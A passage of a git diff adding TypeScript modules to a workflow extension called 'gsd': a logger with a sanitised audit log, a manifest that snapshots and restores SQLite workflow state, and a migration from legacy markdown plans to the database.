+  | "guided"        // Guided flow (discuss, plan wizards)
+  | "registry"      // Rule registry hook state
+  | "renderer"      // Markdown renderer and projections
+  | "safety";       // LLM safety harness
+
+export interface LogEntry {
+  ts: string;
+  severity: LogSeverity;
+  component: LogComponent;
+  message: string;
+  /** Optional structured context (file path, command name, etc.) */
+  context?: Record<string, string>;
+}
+
+// ─── Buffer & Persistent Audit ──────────────────────────────────────────
+
+const MAX_BUFFER = 100;
+let _buffer: LogEntry[] = [];
+let _auditBasePath: string | null = null;
+
+/**
+ * Set the base path for persistent audit log writes.
+ * Should be called once at engine init with the project root.
+ * Until set, log entries are buffered in-memory only.
+ */
+export function setLogBasePath(basePath: string): void {
+  _auditBasePath = basePath;
+}
+
+// ─── Public API ─────────────────────────────────────────────────────────
+
+/**
+ * Record a warning. Also writes to stderr for terminal visibility.
+ */
+export function logWarning(
+  component: LogComponent,
+  message: string,
+  context?: Record<string, string>,
+): void {
+  _push("warn", component, message, context);
+}
+
+/**
+ * Record an error. Also writes to stderr for terminal visibility.
+ */
+export function logError(
+  component: LogComponent,
+  message: string,
+  context?: Record<string, string>,
+): void {
+  _push("error", component, message, context);
+}
+
+/**
+ * Drain all accumulated entries and clear the buffer.
+ * Returns entries oldest-first.
+ *
+ * WARNING: Call summarizeLogs() or drainAndSummarize() BEFORE calling this
+ * if you need a summary — drainLogs() clears the buffer immediately.
+ */
+export function drainLogs(): LogEntry[] {
+  const entries = _buffer;
+  _buffer = [];
+  return entries;
+}
+
+/**
+ * Atomically summarize then drain — the safe way to consume logs.
+ * Use this in the auto-loop instead of calling summarizeLogs() + drainLogs()
+ * separately to avoid the ordering footgun.
+ */
+export function drainAndSummarize(): { logs: LogEntry[]; summary: string | null } {
+  const summary = summarizeLogs();
+  const logs = drainLogs();
+  return { logs, summary };
+}
+
+/**
+ * Peek at current entries without clearing.
+ */
+export function peekLogs(): readonly LogEntry[] {
+  return _buffer;
+}
+
+/**
+ * Returns true if the buffer contains any error-severity entries.
+ */
+export function hasErrors(): boolean {
+  return _buffer.some((e) => e.severity === "error");
+}
+
+/**
+ * Returns true if the buffer contains any warn-severity entries.
+ * Use hasAnyIssues() if you want to check for either severity.
+ */
+export function hasWarnings(): boolean {
+  return _buffer.some((e) => e.severity === "warn");
+}
+
+/**
+ * Returns true if the buffer contains any entries (warn or error).
+ */
+export function hasAnyIssues(): boolean {
+  return _buffer.length > 0;
+}
+
+/**
+ * Get a one-line summary of accumulated issues for stuck detection messages.
+ * Returns null if no entries.
+ *
+ * Must be called BEFORE drainLogs() — use drainAndSummarize() for safe ordering.
+ */
+export function summarizeLogs(): string | null {
+  if (_buffer.length === 0) return null;
+  const errors = _buffer.filter((e) => e.severity === "error");
+  const warns = _buffer.filter((e) => e.severity === "warn");
+
+  const parts: string[] = [];
+  if (errors.length > 0) {
+    parts.push(`${errors.length} error(s): ${errors.map((e) => e.message).join("; ")}`);
+  }
+  if (warns.length > 0) {
+    parts.push(`${warns.length} warning(s): ${warns.map((e) => e.message).join("; ")}`);
+  }
+  return parts.join(" | ");
+}
+
+/**
+ * Format entries for display (used by auto-loop post-unit notification).
+ * Includes key context fields (file paths, commands) when present.
+ */
+export function formatForNotification(entries: readonly LogEntry[]): string {
+  if (entries.length === 0) return "";
+  return entries.map((e) => {
+    let line = `[${e.component}] ${e.message}`;
+    if (e.context) {
+      const ctxParts = Object.entries(e.context)
+        .filter(([k]) => k !== "error") // error is redundant with message
+        .map(([k, v]) => v.includes(",") ? `${k}: "${v}"` : `${k}: ${v}`);
+      if (ctxParts.length > 0) {
+        line += ` (${ctxParts.join(", ")})`;
+      }
+    }
+    return line;
+  }).join("\n");
+}
+
+/**
+ * Read all entries from the persistent audit log.
+ * Returns empty array if no basePath is set or the file doesn't exist.
+ */
+export function readAuditLog(basePath?: string): LogEntry[] {
+  const bp = basePath ?? _auditBasePath;
+  if (!bp) return [];
+  const auditPath = join(bp, ".gsd", "audit-log.jsonl");
+  if (!existsSync(auditPath)) return [];
+  try {
+    const content = readFileSync(auditPath, "utf-8");
+    return content
+      .split("\n")
+      .filter((l) => l.length > 0)
+      .map((l) => {
+        try { return JSON.parse(l) as LogEntry; } catch { return null; }
+      })
+      .filter((e): e is LogEntry => e !== null);
+  } catch {
+    return [];
+  }
+}
+
+/**
+ * Reset buffer. Call at the start of each auto-loop unit to prevent log bleed
+ * between units running in the same process. Also used in tests via _resetLogs().
+ */
+export function _resetLogs(): void {
+  _buffer = [];
+}
+
+// ─── Internal ───────────────────────────────────────────────────────────
+
+function _push(
+  severity: LogSeverity,
+  component: LogComponent,
+  message: string,
+  context?: Record<string, string>,
+): void {
+  const entry: LogEntry = {
+    ts: new Date().toISOString(),
+    severity,
+    component,
+    message,
+    ...(context ? { context } : {}),
+  };
+
+  // Always forward to stderr so terminal watchers see it (see module header for policy)
+  const prefix = severity === "error" ? "ERROR" : "WARN";
+  const ctxStr = context ? ` ${JSON.stringify(context)}` : "";
+  process.stderr.write(`[gsd:${component}] ${prefix}: ${message}${ctxStr}\n`);
+
+  // Persist to notification store (both warnings and errors)
+  try {
+    appendNotification(
+      `[${component}] ${message}`,
+      severity === "error" ? "error" : "warning",
+      "workflow-logger",
+    );
+  } catch (notifErr) {
+    process.stderr.write(`[gsd:workflow-logger] notification-store append failed: ${(notifErr as Error).message}\n`);
+  }
+
+  // Buffer for auto-loop to drain
+  _buffer.push(entry);
+  if (_buffer.length > MAX_BUFFER) {
+    _buffer.shift();
+  }
+
+  // Persist errors to .gsd/audit-log.jsonl so they survive context resets.
+  // Only error-severity entries are persisted — warnings are ephemeral (stderr + buffer)
+  // to avoid log amplification from expected-control-flow catch paths.
+  if (_auditBasePath && severity === "error") {
+    try {
+      const auditDir = join(_auditBasePath, ".gsd");
+      mkdirSync(auditDir, { recursive: true });
+      const sanitized = _sanitizeForAudit(entry);
+      appendFileSync(join(auditDir, "audit-log.jsonl"), JSON.stringify(sanitized) + "\n", "utf-8");
+    } catch (auditErr) {
+      // Best-effort — never let audit write failures bubble up
+      process.stderr.write(`[gsd:audit] failed to persist log entry: ${(auditErr as Error).message}\n`);
+    }
+  }
+}
+
+/**
+ * Sanitize a log entry before persisting to the audit JSONL file.
+ * Strips potentially sensitive context (raw paths, cwd, full error text)
+ * to avoid leaking local environment details into durable telemetry.
+ */
+function _sanitizeForAudit(entry: LogEntry): LogEntry {
+  const sanitized: LogEntry = {
+    ts: entry.ts,
+    severity: entry.severity,
+    component: entry.component,
+    // Truncate message to avoid persisting oversized raw error dumps
+    message: entry.message.length > 200 ? entry.message.slice(0, 200) + "…[truncated]" : entry.message,
+  };
+  if (entry.context) {
+    // Allowlist: only persist known-safe structured keys
+    const SAFE_KEYS = new Set(["fn", "tool", "mid", "sid", "tid", "worktree", "id", "error", "count"]);
+    const filtered: Record<string, string> = {};
+    for (const [k, v] of Object.entries(entry.context)) {
+      if (SAFE_KEYS.has(k)) {
+        filtered[k] = v;
+      }
+    }
+    if (Object.keys(filtered).length > 0) {
+      sanitized.context = filtered;
+    }
+  }
+  return sanitized;
+}
diff --git a/src/resources/extensions/gsd/workflow-manifest.ts b/src/resources/extensions/gsd/workflow-manifest.ts
new file mode 100644
index 000000000..3d6af0327
--- /dev/null
+++ b/src/resources/extensions/gsd/workflow-manifest.ts
@@ -0,0 +1,351 @@
+import {
+  _getAdapter,
+  transaction,
+  type MilestoneRow,
+  type SliceRow,
+  type TaskRow,
+} from "./gsd-db.js";
+import type { Decision } from "./types.js";
+import { atomicWriteSync } from "./atomic-write.js";
+import { readFileSync, existsSync, mkdirSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── Manifest Types ──────────────────────────────────────────────────────
+
+export interface VerificationEvidenceRow {
+  id: number;
+  task_id: string;
+  slice_id: string;
+  milestone_id: string;
+  command: string;
+  exit_code: number | null;
+  verdict: string;
+  duration_ms: number | null;
+  created_at: string;
+}
+
+export interface StateManifest {
+  version: 1;
+  exported_at: string; // ISO 8601
+  milestones: MilestoneRow[];
+  slices: SliceRow[];
+  tasks: TaskRow[];
+  decisions: Decision[];
+  verification_evidence: VerificationEvidenceRow[];
+}
+
+// ─── helpers ─────────────────────────────────────────────────────────────
+
+function requireDb() {
+  const db = _getAdapter();
+  if (!db) throw new Error("workflow-manifest: No database open");
+  return db;
+}
+
+/**
+ * Coerce a raw DB value to a number, returning `fallback` for
+ * null/undefined/non-numeric strings (e.g. "-", "N/A", "").
+ * SQLite can store TEXT in INTEGER columns after migrations or manual inserts.
+ */
+export function toNumeric(value: unknown, fallback: number | null = null): number | null {
+  if (value === null || value === undefined) return fallback;
+  if (typeof value === "number") return Number.isFinite(value) ? value : fallback;
+  if (typeof value === "string") {
+    const trimmed = value.trim();
+    if (trimmed === "" || trimmed === "-" || trimmed === "N/A") return fallback;
+    const n = Number(trimmed);
+    return Number.isFinite(n) ? n : fallback;
+  }
+  return fallback;
+}
+
+// ─── snapshotState ───────────────────────────────────────────────────────
+
+/**
+ * Capture complete DB state as a StateManifest.
+ * Reads all rows from milestones, slices, tasks, decisions, verification_evidence.
+ *
+ * Note: rows returned from raw queries are plain objects with TEXT columns for
+ * JSON arrays. We parse them into typed Row objects using the same logic as
+ * gsd-db helper functions.
+ */
+export function snapshotState(): StateManifest {
+  const db = requireDb();
+
+  // Wrap all reads in a deferred transaction so the snapshot is consistent
+  // (all SELECTs see the same DB state even if a concurrent write lands between them).
+  db.exec("BEGIN DEFERRED");
+
+  try {
+  const rawMilestones = db.prepare("SELECT * FROM milestones ORDER BY id").all() as Record<string, unknown>[];
+  const milestones: MilestoneRow[] = rawMilestones.map((r) => ({
+    id: r["id"] as string,
+    title: r["title"] as string,
+    status: r["status"] as string,
+    depends_on: JSON.parse((r["depends_on"] as string) || "[]"),
+    created_at: r["created_at"] as string,
+    completed_at: (r["completed_at"] as string) ?? null,
+    vision: (r["vision"] as string) ?? "",
+    success_criteria: JSON.parse((r["success_criteria"] as string) || "[]"),
+    key_risks: JSON.parse((r["key_risks"] as string) || "[]"),
+    proof_strategy: JSON.parse((r["proof_strategy"] as string) || "[]"),
+    verification_contract: (r["verification_contract"] as string) ?? "",
+    verification_integration: (r["verification_integration"] as string) ?? "",
+    verification_operational: (r["verification_operational"] as string) ?? "",
+    verification_uat: (r["verification_uat"] as string) ?? "",
+    definition_of_done: JSON.parse((r["definition_of_done"] as string) || "[]"),
+    requirement_coverage: (r["requirement_coverage"] as string) ?? "",
+    boundary_map_markdown: (r["boundary_map_markdown"] as string) ?? "",
+  }));
+
+  const rawSlices = db.prepare("SELECT * FROM slices ORDER BY milestone_id, sequence, id").all() as Record<string, unknown>[];
+  const slices: SliceRow[] = rawSlices.map((r) => ({
+    milestone_id: r["milestone_id"] as string,
+    id: r["id"] as string,
+    title: r["title"] as string,
+    status: r["status"] as string,
+    risk: r["risk"] as string,
+    depends: JSON.parse((r["depends"] as string) || "[]"),
+    demo: (r["demo"] as string) ?? "",
+    created_at: r["created_at"] as string,
+    completed_at: (r["completed_at"] as string) ?? null,
+    full_summary_md: (r["full_summary_md"] as string) ?? "",
+    full_uat_md: (r["full_uat_md"] as string) ?? "",
+    goal: (r["goal"] as string) ?? "",
+    success_criteria: (r["success_criteria"] as string) ?? "",
+    proof_level: (r["proof_level"] as string) ?? "",
+    integration_closure: (r["integration_closure"] as string) ?? "",
+    observability_impact: (r["observability_impact"] as string) ?? "",
+    sequence: toNumeric(r["sequence"], 0) as number,
+    replan_triggered_at: (r["replan_triggered_at"] as string) ?? null,
+  }));
+
+  const rawTasks = db.prepare("SELECT * FROM tasks ORDER BY milestone_id, slice_id, sequence, id").all() as Record<string, unknown>[];
+  const tasks: TaskRow[] = rawTasks.map((r) => ({
+    milestone_id: r["milestone_id"] as string,
+    slice_id: r["slice_id"] as string,
+    id: r["id"] as string,
+    title: r["title"] as string,
+    status: r["status"] as string,
+    one_liner: (r["one_liner"] as string) ?? "",
+    narrative: (r["narrative"] as string) ?? "",
+    verification_result: (r["verification_result"] as string) ?? "",
+    duration: (r["duration"] as string) ?? "",
+    completed_at: (r["completed_at"] as string) ?? null,
+    blocker_discovered: (r["blocker_discovered"] as number) === 1,
+    deviations: (r["deviations"] as string) ?? "",
+    known_issues: (r["known_issues"] as string) ?? "",
+    key_files: JSON.parse((r["key_files"] as string) || "[]"),
+    key_decisions: JSON.parse((r["key_decisions"] as string) || "[]"),
+    full_summary_md: (r["full_summary_md"] as string) ?? "",
+    description: (r["description"] as string) ?? "",
+    estimate: (r["estimate"] as string) ?? "",
+    files: JSON.parse((r["files"] as string) || "[]"),
+    verify: (r["verify"] as string) ?? "",
+    inputs: JSON.parse((r["inputs"] as string) || "[]"),
+    expected_output: JSON.parse((r["expected_output"] as string) || "[]"),
+    observability_impact: (r["observability_impact"] as string) ?? "",
+    full_plan_md: (r["full_plan_md"] as string) ?? "",
+    sequence: toNumeric(r["sequence"], 0) as number,
+  }));
+
+  const rawDecisions = db.prepare("SELECT * FROM decisions ORDER BY seq").all() as Record<string, unknown>[];
+  const decisions: Decision[] = rawDecisions.map((r) => ({
+    seq: toNumeric(r["seq"], 0) as number,
+    id: r["id"] as string,
+    when_context: (r["when_context"] as string) ?? "",
+    scope: (r["scope"] as string) ?? "",
+    decision: (r["decision"] as string) ?? "",
+    choice: (r["choice"] as string) ?? "",
+    rationale: (r["rationale"] as string) ?? "",
+    revisable: (r["revisable"] as string) ?? "",
+    made_by: (r["made_by"] as string as Decision["made_by"]) ?? "agent",
+    superseded_by: (r["superseded_by"] as string) ?? null,
+  }));
+
+  const rawEvidence = db.prepare("SELECT * FROM verification_evidence ORDER BY id").all() as Record<string, unknown>[];
+  const verification_evidence: VerificationEvidenceRow[] = rawEvidence.map((r) => ({
+    id: r["id"] as number,
+    task_id: r["task_id"] as string,
+    slice_id: r["slice_id"] as string,
+    milestone_id: r["milestone_id"] as string,
+    command: r["command"] as string,
+    exit_code: toNumeric(r["exit_code"]),
+    verdict: (r["verdict"] as string) ?? "",
+    duration_ms: toNumeric(r["duration_ms"]),
+    created_at: r["created_at"] as string,
+  }));
+
+  const result: StateManifest = {
+    version: 1,
+    exported_at: new Date().toISOString(),
+    milestones,
+    slices,
+    tasks,
+    decisions,
+    verification_evidence,
+  };
+
+  db.exec("COMMIT");
+  return result;
+  } catch (err) {
+    try { db.exec("ROLLBACK"); } catch { /* ignore rollback failure */ }
+    throw err;
+  }
+}
+
+// ─── restore ─────────────────────────────────────────────────────────────
+
+/**
+ * Atomically replace all workflow state from a manifest.
+ * Runs inside a transaction — if any insert fails, no tables are modified.
+ * Only touches engine tables + decisions. Does NOT modify artifacts or memories.
+ */
+function restore(manifest: StateManifest): void {
+  const db = requireDb();
+
+  transaction(() => {
+    // Clear engine tables (order matters for foreign-key-like consistency)
+    db.exec("DELETE FROM verification_evidence");
+    db.exec("DELETE FROM tasks");
+    db.exec("DELETE FROM slices");
+    db.exec("DELETE FROM milestones");
+    db.exec("DELETE FROM decisions WHERE 1=1");
+
+    // Restore milestones
+    const msStmt = db.prepare(
+      `INSERT INTO milestones (id, title, status, depends_on, created_at, completed_at,
+        vision, success_criteria, key_risks, proof_strategy,
+        verification_contract, verification_integration, verification_operational, verification_uat,
+        definition_of_done, requirement_coverage, boundary_map_markdown)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
+    );
+    for (const m of manifest.milestones) {
+      msStmt.run(
+        m.id, m.title, m.status,
+        JSON.stringify(m.depends_on), m.created_at, m.completed_at,
+        m.vision, JSON.stringify(m.success_criteria), JSON.stringify(m.key_risks),
+        JSON.stringify(m.proof_strategy),
+        m.verification_contract, m.verification_integration, m.verification_operational, m.verification_uat,
+        JSON.stringify(m.definition_of_done), m.requirement_coverage, m.boundary_map_markdown,
+      );
+    }
+
+    // Restore slices
+    const slStmt = db.prepare(
+      `INSERT INTO slices (milestone_id, id, title, status, risk, depends, demo,
+        created_at, completed_at, full_summary_md, full_uat_md,
+        goal, success_criteria, proof_level, integration_closure, observability_impact,
+        sequence, replan_triggered_at)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
+    );
+    for (const s of manifest.slices) {
+      slStmt.run(
+        s.milestone_id, s.id, s.title, s.status, s.risk,
+        JSON.stringify(s.depends), s.demo,
+        s.created_at, s.completed_at, s.full_summary_md, s.full_uat_md,
+        s.goal, s.success_criteria, s.proof_level, s.integration_closure, s.observability_impact,
+        s.sequence, s.replan_triggered_at,
+      );
+    }
+
+    // Restore tasks
+    const tkStmt = db.prepare(
+      `INSERT INTO tasks (milestone_id, slice_id, id, title, status,
+        one_liner, narrative, verification_result, duration, completed_at,
+        blocker_discovered, deviations, known_issues, key_files, key_decisions,
+        full_summary_md, description, estimate, files, verify,
+        inputs, expected_output, observability_impact, sequence)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
+    );
+    for (const t of manifest.tasks) {
+      tkStmt.run(
+        t.milestone_id, t.slice_id, t.id, t.title, t.status,
+        t.one_liner, t.narrative, t.verification_result, t.duration, t.completed_at,
+        t.blocker_discovered ? 1 : 0, t.deviations, t.known_issues,
+        JSON.stringify(t.key_files), JSON.stringify(t.key_decisions),
+        t.full_summary_md, t.description, t.estimate, JSON.stringify(t.files), t.verify,
+        JSON.stringify(t.inputs), JSON.stringify(t.expected_output),
+        t.observability_impact, t.sequence,
+      );
+    }
+
+    // Restore decisions
+    const dcStmt = db.prepare(
+      `INSERT INTO decisions (seq, id, when_context, scope, decision, choice, rationale, revisable, made_by, superseded_by)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
+    );
+    for (const d of manifest.decisions) {
+      dcStmt.run(d.seq, d.id, d.when_context, d.scope, d.decision, d.choice, d.rationale, d.revisable, d.made_by, d.superseded_by);
+    }
+
+    // Restore verification evidence
+    const evStmt = db.prepare(
+      `INSERT INTO verification_evidence (task_id, slice_id, milestone_id, command, exit_code, verdict, duration_ms, created_at)
+       VALUES (?, ?, ?, ?, ?, ?, ?, ?)`,
+    );
+    for (const e of manifest.verification_evidence) {
+      evStmt.run(e.task_id, e.slice_id, e.milestone_id, e.command, e.exit_code, e.verdict, e.duration_ms, e.created_at);
+    }
+  });
+}
+
+// ─── writeManifest ───────────────────────────────────────────────────────
+
+/**
+ * Write current DB state to .gsd/state-manifest.json via atomicWriteSync.
+ * Uses JSON.stringify with 2-space indent for git three-way merge friendliness.
+ */
+export function writeManifest(basePath: string): void {
+  const manifest = snapshotState();
+  const json = JSON.stringify(manifest, null, 2);
+  const dir = join(basePath, ".gsd");
+  mkdirSync(dir, { recursive: true });
+  atomicWriteSync(join(dir, "state-manifest.json"), json);
+}
+
+// ─── readManifest ────────────────────────────────────────────────────────
+
+/**
+ * Read state-manifest.json and return parsed manifest, or null if not found.
+ */
+export function readManifest(basePath: string): StateManifest | null {
+  const manifestPath = join(basePath, ".gsd", "state-manifest.json");
+
+  if (!existsSync(manifestPath)) {
+    return null;
+  }
+
+  const raw = readFileSync(manifestPath, "utf-8");
+  const parsed = JSON.parse(raw) as StateManifest;
+
+  if (parsed.version !== 1) {
+    throw new Error(`Unsupported manifest version: ${parsed.version}`);
+  }
+
+  // Validate required fields to avoid cryptic errors during restore
+  if (!Array.isArray(parsed.milestones) || !Array.isArray(parsed.slices) ||
+      !Array.isArray(parsed.tasks) || !Array.isArray(parsed.decisions) ||
+      !Array.isArray(parsed.verification_evidence)) {
+    throw new Error("Malformed manifest: missing or invalid required arrays");
+  }
+
+  return parsed;
+}
+
+// ─── bootstrapFromManifest ──────────────────────────────────────────────
+
+/**
+ * Read state-manifest.json and restore DB state from it.
+ * Returns true if bootstrap succeeded, false if manifest file doesn't exist.
+ */
+export function bootstrapFromManifest(basePath: string): boolean {
+  const manifest = readManifest(basePath);
+
+  if (!manifest) {
+    return false;
+  }
+
+  restore(manifest);
+  return true;
+}
diff --git a/src/resources/extensions/gsd/workflow-migration.ts b/src/resources/extensions/gsd/workflow-migration.ts
new file mode 100644
index 000000000..7112e74b7
--- /dev/null
+++ b/src/resources/extensions/gsd/workflow-migration.ts
@@ -0,0 +1,347 @@
+// GSD Extension — Legacy Markdown to Engine Migration
+// Converts legacy markdown-only projects to engine state by parsing
+// existing ROADMAP.md, *-PLAN.md, and *-SUMMARY.md files.
+// Populates data into the already-existing v10 schema tables.
+
+import { existsSync, readdirSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+import { _getAdapter, transaction } from "./gsd-db.js";
+import { parseRoadmap, parsePlan } from "./parsers-legacy.js";
+import { logWarning } from "./workflow-logger.js";
+
+// ─── needsAutoMigration ───────────────────────────────────────────────────
+
+/**
+ * Returns true when engine tables are empty AND a .gsd/milestones/ directory
+ * with markdown files exists — signals that this is a legacy project that needs
+ * one-time migration from markdown to engine state.
+ */
+export function needsAutoMigration(basePath: string): boolean {
+  const db = _getAdapter();
+  if (!db) return false;
+
+  // If milestones table already has rows, migration already done
+  try {
+    const row = db.prepare("SELECT COUNT(*) as cnt FROM milestones").get();
+    if (row && (row["cnt"] as number) > 0) return false;
+  } catch (e) {
+    logWarning("migration", `DB probe failed: ${(e as Error).message}`);
+    return false;
+  }
+
+  // Check if .gsd/milestones/ directory exists
+  const milestonesDir = join(basePath, ".gsd", "milestones");
+  if (!existsSync(milestonesDir)) return false;
+
+  return true;
+}
+
+// ─── migrateFromMarkdown ──────────────────────────────────────────────────
+
+/**
+ * Migrate legacy markdown-only .gsd/ projects to engine DB state.
+ * Reads .gsd/milestones/<ID>/ directories and parses ROADMAP.md, *-PLAN.md
+ * files. All inserts are wrapped in a transaction.
+ *
+ * This function only INSERTs data into the already-existing v10 schema tables
+ * (milestones, slices, tasks). It does NOT create tables or run migrations.
+ *
+ * Handles all directory shapes:
+ * - No DB: caller is responsible for openDatabase + initSchema before calling
+ * - Stale DB (empty tables): inserts succeed normally
+ * - No markdown at all: returns early with stderr message
+ * - Orphaned summary files: logs warning, skips without crash
+ */
+export function migrateFromMarkdown(basePath: string): void {
+  const db = _getAdapter();
+  if (!db) {
+    process.stderr.write("workflow-migration: no database connection, cannot migrate\n");
+    return;
+  }
+
+  const milestonesDir = join(basePath, ".gsd", "milestones");
+  if (!existsSync(milestonesDir)) {
+    process.stderr.write("workflow-migration: no .gsd/milestones/ directory found, nothing to migrate\n");
+    return;
+  }
+
+  // Discover milestone directories (any directory at the top level of milestones/)
+  let milestoneDirs: string[];
+  try {
+    milestoneDirs = readdirSync(milestonesDir, { withFileTypes: true })
+      .filter(e => e.isDirectory())
+      .map(e => e.name);
+  } catch {
+    logWarning("migration", "failed to read milestones directory");
+    return;
+  }
+
+  if (milestoneDirs.length === 0) {
+    process.stderr.write("workflow-migration: no milestone directories found in .gsd/milestones/\n");
+    return;
+  }
+
+  // Collect all data before the transaction
+  const migratedMilestoneIds: string[] = [];
+
+  interface MilestoneInsert {
+    id: string;
+    title: string;
+    status: string;
+  }
+
+  interface SliceInsert {
+    id: string;
+    milestoneId: string;
+    title: string;
+    status: string;
+    risk: string;
+    sequence: number;
+    forceDone: boolean;
+  }
+
+  interface TaskInsert {
+    id: string;
+    sliceId: string;
+    milestoneId: string;
+    title: string;
+    status: string;
+    sequence: number;
+  }
+
+  const milestoneInserts: MilestoneInsert[] = [];
+  const sliceInserts: SliceInsert[] = [];
+  const taskInserts: TaskInsert[] = [];
+
+  for (const mId of milestoneDirs) {
+    const mDir = join(milestonesDir, mId);
+
+    // Determine milestone status: done if a milestone-level SUMMARY.md exists
+    const milestoneSummaryPath = join(mDir, "SUMMARY.md");
+    const milestoneDone = existsSync(milestoneSummaryPath);
+    const milestoneStatus = milestoneDone ? "done" : "active";
+
+    // Parse ROADMAP.md for slices list
+    const roadmapPath = join(mDir, "ROADMAP.md");
+    let roadmapSlices: Array<{ id: string; title: string; done: boolean; risk: string }> = [];
+
+    if (existsSync(roadmapPath)) {
+      try {
+        const roadmapContent = readFileSync(roadmapPath, "utf-8");
+        const roadmap = parseRoadmap(roadmapContent);
+
+        // Extract milestone title from roadmap
+        const mTitle = roadmap.title || mId;
+
+        milestoneInserts.push({ id: mId, title: mTitle, status: milestoneStatus });
+
+        roadmapSlices = roadmap.slices.map(s => ({
+          id: s.id,
+          title: s.title,
+          done: s.done,
+          risk: s.risk || "low",
+        }));
+      } catch (err) {
+        logWarning("migration", `failed to parse ROADMAP.md for ${mId}: ${(err as Error).message}`);
+        // Still add milestone with ID as title
+        milestoneInserts.push({ id: mId, title: mId, status: milestoneStatus });
+      }
+    } else {
+      // No ROADMAP.md — add milestone entry anyway using directory name
+      milestoneInserts.push({ id: mId, title: mId, status: milestoneStatus });
+    }
+
+    migratedMilestoneIds.push(mId);
+
+    // Collect slices from ROADMAP + their tasks from PLAN files
+    const knownSliceIds = new Set(roadmapSlices.map(s => s.id));
+
+    for (let sIdx = 0; sIdx < roadmapSlices.length; sIdx++) {
+      const slice = roadmapSlices[sIdx];
+      // Per Pitfall #5: if milestone is done, force all child slices to done
+      const sliceStatus = milestoneDone ? "done" : (slice.done ? "done" : "pending");
+
+      sliceInserts.push({
+        id: slice.id,
+        milestoneId: mId,
+        title: slice.title,
+        status: sliceStatus,
+        risk: slice.risk,
+        sequence: sIdx,
+        forceDone: milestoneDone,
+      });
+
+      // Read *-PLAN.md for this slice
+      const planPath = join(mDir, `${slice.id}-PLAN.md`);
+      if (existsSync(planPath)) {
+        try {
+          const planContent = readFileSync(planPath, "utf-8");
+          const plan = parsePlan(planContent);
+
+          for (let tIdx = 0; tIdx < plan.tasks.length; tIdx++) {
+            const task = plan.tasks[tIdx];
+            // Per Pitfall #5: if milestone is done, force all tasks to done
+            const taskStatus = milestoneDone ? "done" : (task.done ? "done" : "pending");
+            taskInserts.push({
+              id: task.id,
+              sliceId: slice.id,
+              milestoneId: mId,
+              title: task.title,
+              status: taskStatus,
+              sequence: tIdx,
+            });
+          }
+        } catch (err) {
+          logWarning("migration", `failed to parse ${slice.id}-PLAN.md for ${mId}: ${(err as Error).message}`);
+        }
+      }
+    }
+
+    // Check for orphaned summary files (summary for a slice not in ROADMAP)
+    try {
+      const files = readdirSync(mDir);
+      const summaryFiles = files.filter(f => f.endsWith("-SUMMARY.md") && f !== "SUMMARY.md");
+      for (const summaryFile of summaryFiles) {
+        const sliceId = summaryFile.replace("-SUMMARY.md", "");
+        if (!knownSliceIds.has(sliceId)) {
+          process.stderr.write(`workflow-migration: orphaned summary file ${summaryFile} in ${mId} (slice not found in ROADMAP.md), skipping\n`);
+        }
+      }
+    } catch (e) {
+      logWarning("migration", `Orphaned summary check failed for ${mId}: ${(e as Error).message}`);
+    }
+  }
+
+  // Execute all inserts atomically
+  const now = new Date().toISOString();
+  if (migratedMilestoneIds.length === 0) {
+    process.stderr.write("workflow-migration: no milestones collected, nothing to insert\n");
+    return;
+  }
+
+  const placeholders = migratedMilestoneIds.map(() => "?").join(",");
+  transaction(() => {
+    // Clear existing data to handle stale DB shape (DELETE ... IN (...))
+    db.prepare(`DELETE FROM tasks WHERE milestone_id IN (${placeholders})`).run(...migratedMilestoneIds);
+    db.prepare(`DELETE FROM slices WHERE milestone_id IN (${placeholders})`).run(...migratedMilestoneIds);
+    db.prepare(`DELETE FROM milestones WHERE id IN (${placeholders})`).run(...migratedMilestoneIds);
+
+    // Insert milestones
+    const insertMilestone = db.prepare("INSERT INTO milestones (id, title, status, created_at) VALUES (?, ?, ?, ?)");
+    for (const m of milestoneInserts) {
+      insertMilestone.run(m.id, m.title, m.status, now);
+    }
+
+    // Insert slices (using v10 column names: depends, sequence)
+    const insertSlice = db.prepare(
+      "INSERT INTO slices (id, milestone_id, title, status, risk, depends, sequence, created_at) VALUES (?, ?, ?, ?, ?, ?, ?, ?)"
+    );
+    for (const s of sliceInserts) {
+      insertSlice.run(s.id, s.milestoneId, s.title, s.status, s.risk, "[]", s.sequence, now);
+    }
+
+    // Insert tasks (using v10 column names: sequence, blocker_discovered, full_summary_md)
+    const insertTask = db.prepare(
+      "INSERT INTO tasks (id, slice_id, milestone_id, title, description, status, estimate, files, sequence) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)"
+    );
+    for (const t of taskInserts) {
+      insertTask.run(t.id, t.sliceId, t.milestoneId, t.title, "", t.status, "", "[]", t.sequence);
+    }
+  });
+}
+
+// ─── validateMigration ────────────────────────────────────────────────────
+
+/**
+ * D-14: Validate that engine state matches what markdown parsers report.
+ * Compares milestone count, slice count, task count, and status distributions.
+ * Logs each discrepancy to stderr but does NOT throw.
+ * Returns array of discrepancy strings (empty = clean migration).
+ */
+export function validateMigration(basePath: string): { discrepancies: string[] } {
+  const db = _getAdapter();
+  if (!db) {
+    return { discrepancies: ["No database connection for validation"] };
+  }
+
+  const discrepancies: string[] = [];
+
+  // Get engine counts
+  const engMilestones = db.prepare("SELECT COUNT(*) as cnt FROM milestones").get();
+  const engSlices = db.prepare("SELECT COUNT(*) as cnt FROM slices").get();
+  const engTasks = db.prepare("SELECT COUNT(*) as cnt FROM tasks").get();
+
+  const engineMilestoneCount = engMilestones ? (engMilestones["cnt"] as number) : 0;
+  const engineSliceCount = engSlices ? (engSlices["cnt"] as number) : 0;
+  const engineTaskCount = engTasks ? (engTasks["cnt"] as number) : 0;
+
+  // Count from markdown
+  const milestonesDir = join(basePath, ".gsd", "milestones");
+  if (!existsSync(milestonesDir)) {
+    return { discrepancies };
+  }
+
+  let mdMilestoneCount = 0;
+  let mdSliceCount = 0;
+  let mdTaskCount = 0;
+
+  try {
+    const milestoneDirs = readdirSync(milestonesDir, { withFileTypes: true })
+      .filter(e => e.isDirectory())
